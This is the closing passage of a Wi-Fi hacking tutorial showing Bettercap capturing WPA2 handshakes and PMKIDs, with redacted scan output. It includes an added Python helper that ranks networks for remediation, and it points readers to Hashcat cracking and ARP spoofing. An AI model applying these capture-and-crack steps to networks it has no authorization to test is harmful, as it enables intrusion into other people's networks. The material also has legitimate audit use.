wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap

Now that we've tried both tools, let's take a look at our results with wifi.show. We should, if we're lucky, see more networks in red. While there are no colors below, five of them were indeed red.

wlan1  » wifi.show

+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴  | BSSID             | SSID                          | Encryption       | WPS | Ch | Clients | Sent   | Recvd  | Seen     |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, PSK) |     | 6  | 5       | 12 kB  |        | 23:04:36 |
| -57 dBm | ██:██:██:██:██:██ | █████████████                 | WPA2 (CCMP, PSK) |     | 6  | 1       | 6.5 kB | 66 B   | 23:04:34 |
| -63 dBm | ██:██:██:██:██:██ | ██████                        | WPA2 (CCMP, PSK) |     | 11 | 2       | 1.2 kB |        | 23:04:34 |
| -64 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (CCMP, PSK) | 2.0 | 5  | 2       | 7.1 kB | 128 B  | 23:04:32 |
| -90 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:04:36 |
| -71 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 1  | 2       | 353 B  |        | 23:04:35 |
| -72 dBm | ██:██:██:██:██:██ | ████████████████████████████  | WPA2 (CCMP, PSK) |     | 6  | 1       | 4.9 kB |        | 23:04:36 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:04:31 |
| -81 dBm | ██:██:██:██:██:██ | ████████████████              | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:04:36 |
| -82 dBm | ██:██:██:██:██:██ | ████████████████████████      | WPA2 (CCMP, PSK) |     | 7  |         |        |        | 23:04:37 |
| -86 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, PSK) |     | 1  |         |        |        | 23:04:31 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:04:32 |
| -86 dBm | ██:██:██:██:██:██ | ██████████████                | WPA2 (CCMP, PSK) |     | 6  |         | 670 B  | 384 B  | 23:04:32 |
| -86 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:04:31 |
| -87 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, PSK) |     | 6  |         | 759 B  |        | 23:04:32 |
| -87 dBm | ██:██:██:██:██:██ | ████████████████████          | WPA2 (CCMP, PSK) |     | 6  |         | 228 B  | 1.2 kB | 23:04:34 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████   | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:04:34 |
| -88 dBm | ██:██:██:██:██:██ | ██████████████████            | WPA2 (CCMP, PSK) |     | 8  |         |        |        | 23:04:34 |
| -91 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (TKIP, PSK) |     | 11 |         | 1.7 kB |        | 23:04:34 |
| -92 dBm | ██:██:██:██:██:██ | ██                            | WPA2 (CCMP, PSK) | 2.0 | 11 |         |        |        | 23:04:38 |
| -92 dBm | ██:██:██:██:██:██ | ████████                      | WPA2 (TKIP, PSK) |     | 11 |         |        |        | 23:04:38 |
| -94 dBm | ██:██:██:██:██:██ | ██████████████████████████    | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:04:39 |
| -95 dBm | ██:██:██:██:██:██ | █████████████████             | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:04:39 |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+

wlan1mon (ch. 12) / ↑ 45 kB / ↓ 8.9 MB / 38377 pkts / 3 handshakes

By running both modules, we were able to grab the information we need for five out of the ten closest Wi-Fi networks. That's pretty impressive. If we open the file Bettercap generated from these captures, we can see the information Bettercap has saved for us to crack in another program.
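Reading both kinds of output by eye gets tedious once the table runs past a dozen rows. As an added example (not Bettercap's own code, nor the author's), the following Python helper parses the two formats shown in this section, the wifi.show table and the [wifi.client.handshake] event lines from Step 7, and turns them into the prioritized list a network owner would want from an authorized test: which SSIDs still run TKIP or advertise WPS, which rely on a pre-shared key that can be guessed offline once a handshake or PMKID is on disk, and which already have a capture saved. The table and event lines embedded below are constructed samples in the same layout as the output above; every BSSID, SSID, client address and path in them is invented.

```python
"""Turn Bettercap Wi-Fi recon output into a prioritized audit list.
Added example for this page, not Bettercap's own code. It parses the text
layout of wifi.show and of the [wifi.client.handshake] event lines above."""
import re
from dataclasses import dataclass, field

# Constructed sample in the layout of the wifi.show table (invented BSSIDs and SSIDs).
SAMPLE_TABLE = """\
+---------+-------------------+------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴  | BSSID             | SSID       | Encryption       | WPS | Ch | Clients | Sent   | Recvd  | Seen     |
+---------+-------------------+------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | 02:00:00:00:00:01 | HomeNet    | WPA2 (CCMP, PSK) |     | 6  | 5       | 12 kB  |        | 23:04:36 |
| -63 dBm | 02:00:00:00:00:02 | CoffeeShop | WPA2 (CCMP, PSK) | 2.0 | 11 | 2       | 1.2 kB |        | 23:04:34 |
| -86 dBm | 02:00:00:00:00:03 | Corp-8021X | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:04:31 |
| -91 dBm | 02:00:00:00:00:04 | OldRouter  | WPA2 (TKIP, PSK) |     | 11 |         | 1.7 kB |        | 23:04:34 |
+---------+-------------------+------------+------------------+-----+----+---------+--------+--------+----------+
"""

# Constructed events in the format of the wifi.client.handshake lines (invented addresses).
SAMPLE_EVENTS = """\
[23:04:58] [wifi.client.handshake] captured 02:00:00:00:00:aa -> HomeNet (02:00:00:00:00:01) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
[23:04:58] [wifi.client.handshake] captured 02:00:00:00:00:bb -> HomeNet (02:00:00:00:00:01) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
[23:04:59] [wifi.client.handshake] captured 02:00:00:00:00:cc -> OldRouter (02:00:00:00:00:04) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
"""

# "WPA2 (CCMP, PSK)" -> protocol, cipher, key management; the parenthesised part is optional.
ENC_RE = re.compile(r"^(?P<proto>\S+)(?: \((?P<cipher>[^,]+), (?P<auth>[^)]+)\))?$")
EVENT_RE = re.compile(
    r"\[wifi\.client\.handshake\] captured (?P<client>\S+) -> (?P<ssid>.*?) "
    r"\((?P<bssid>[0-9a-fA-F:]{17})\) (?P<what>.+?) to (?P<path>\S+)$"
)


def parse_show_table(text):
    """Parse the ASCII table printed by wifi.show into one dict per network, keyed by header."""
    rows = [line for line in text.splitlines() if line.startswith("|")]

    def cells(line):
        return [c.strip() for c in line.strip().strip("|").split("|")]

    headers = [h.rstrip(" ▴▾") for h in cells(rows[0])]  # drop the sort-direction arrow
    networks = []
    for line in rows[1:]:
        values = cells(line)
        if len(values) != len(headers):
            continue  # truncated or wrapped row: skip it rather than misalign the columns
        net = dict(zip(headers, values))
        m = ENC_RE.match(net["Encryption"])
        net["proto"] = m.group("proto") if m else net["Encryption"]
        net["cipher"] = (m.group("cipher") or "") if m else ""
        net["auth"] = (m.group("auth") or "") if m else ""
        net["Clients"] = int(net["Clients"] or 0)
        net["BSSID"] = net["BSSID"].lower()
        networks.append(net)
    return networks


def parse_handshake_events(text):
    """Map BSSID -> list of (client, what was captured, pcap path) from the event stream."""
    captures = {}
    for line in text.splitlines():
        m = EVENT_RE.search(line)
        if m:
            entry = (m.group("client").lower(), m.group("what"), m.group("path"))
            captures.setdefault(m.group("bssid").lower(), []).append(entry)
    return captures


@dataclass
class Finding:
    bssid: str
    ssid: str
    priority: int  # higher means fix first
    reasons: list = field(default_factory=list)


def assess(networks, captures):
    """Rank networks by how exposed their key material is, with the reasons a report would list."""
    findings = []
    for net in networks:
        f = Finding(net["BSSID"], net["SSID"], 0)
        if net["auth"] == "PSK":
            f.priority += 2
            f.reasons.append("pre-shared key: a captured handshake or PMKID can be guessed offline, so passphrase strength is the only defence")
        if net["cipher"] == "TKIP":
            f.priority += 2
            f.reasons.append("TKIP cipher is deprecated; move to CCMP or WPA3")
        if net["WPS"]:
            f.priority += 1
            f.reasons.append(f"WPS {net['WPS']} advertised; disable it unless it is required")
        caps = captures.get(net["BSSID"], [])
        if caps:
            kinds = ", ".join(sorted({what for _, what, _ in caps}))
            f.priority += 3
            f.reasons.append(f"{len(caps)} capture(s) ({kinds}) already saved to {caps[0][2]}; treat the passphrase as exposed and rotate it")
        if net["auth"] == "MGT":
            f.reasons.append("802.1X (MGT): no pre-shared key to recover; review the RADIUS/EAP setup instead")
        findings.append(f)
    return sorted(findings, key=lambda x: x.priority, reverse=True)
```

Feed it the text you paste from the Bettercap session (for example `assess(parse_show_table(table_text), parse_handshake_events(event_text))`) and print each Finding's priority, SSID and reasons. On the constructed sample, OldRouter ranks first (PSK, TKIP and a recorded PMKID), HomeNet second, the WPS-enabled coffee shop third, and the 802.1X network last with only an advisory note, which is the order a remediation ticket list would follow.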

There we go! With Bettercap, we can capture the signals we need from Wi-Fi networks to brute-force weak passwords. You can follow our guide on handshake cracking with Hashcat to try brute-forcing the passwords.

Bettercap Is the Swiss Army Knife of Wi-Fi Hacking

Bettercap is an essential part of any hacker's toolkit, especially for the ability to run smoothly on low-cost devices like a Raspberry Pi. With Bettercap's ability to quickly discover low-hanging fruit like weak network passwords, you can use it to gain further access to devices on a network through ARP spoofing and poisoning in other Bettercap modules.

Make sure only to use the active modules of Bettercap on networks you have permission to use, but the recon modules are fine to use virtually anywhere. With enough patience, Bettercap will simply record handshakes when users connect to the network naturally, without needing to attack the network at all.

I hope you enjoyed this guide to using Bettercap to hack Wi-Fi networks! If you have any questions about this tutorial, there's the comments section below, and feel free to follow me on Twitter @KodyKinzie.


Cover photo and screenshots by Kody/Null Byte
